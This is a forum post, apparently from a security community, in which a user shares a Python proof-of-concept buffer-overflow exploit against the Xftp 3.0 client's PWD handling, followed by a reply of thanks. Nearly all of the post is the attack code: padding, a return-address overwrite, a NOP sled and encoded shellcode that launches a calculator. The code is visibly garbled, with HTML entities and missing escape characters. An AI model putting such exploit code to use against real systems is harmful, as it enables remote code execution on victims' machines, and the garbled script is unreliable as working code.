Xftp 3.0 PWD exploit - System Security

chroniccommand

This exploit was not found by me, but coded by me. This was found and coded in Perl somet time ago, but I recoded it in Python. It's a little buggy but it's exploits a vulnerability in Xftp version 3.0.


#!/usr/bin/python
import socket
print (\"#Xftp client 3&#46;0 PWD exploit#n\")
address=\"192&#46;168&#46;1&#46;4\"
port=80
buff = \"GET\"
junk = \"x41\" * 1019
eip  = ( 'V', 0x100123AF ) * 4
nops = \"x90\" * 55
calcshell = (\"x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49\"
\"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56\"
\"x58x34x41x50x30x41x33x48x48x30x41x30x30x41\"
\"x42x41x41x42x54x41x41x51x32x41x42x32x42x42\"
\"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a\"
\"x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47\"
\"x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c\"
\"x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a\"
\"x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50\"
\"x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43\"
\"x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a\"
\"x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c\"
\"x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44\"
\"x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c\"
\"x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47\"
\"x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50\"
\"x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44\"
\"x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43\"
\"x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42\"
\"x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b\"
\"x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45\"
\"x31x42x4cx42x43x45x50x41x41\")

payload = junk + eip + nops + calcshell
buff += \"HTTP/1&#46;1rnrn\"
sock = socket&#46;socket(socket&#46;AF_INET, socket&#46;SOCK_STREAM)
connect = sock&#46;connect((address,port))
sock&#46;send(payload)
sock&#46;close()
print (\"Payload delivered to the client!n\")

Xin

Nice exploit :), thanks for the share

Howdy, Stranger!

Top Posters

Who's Online (0)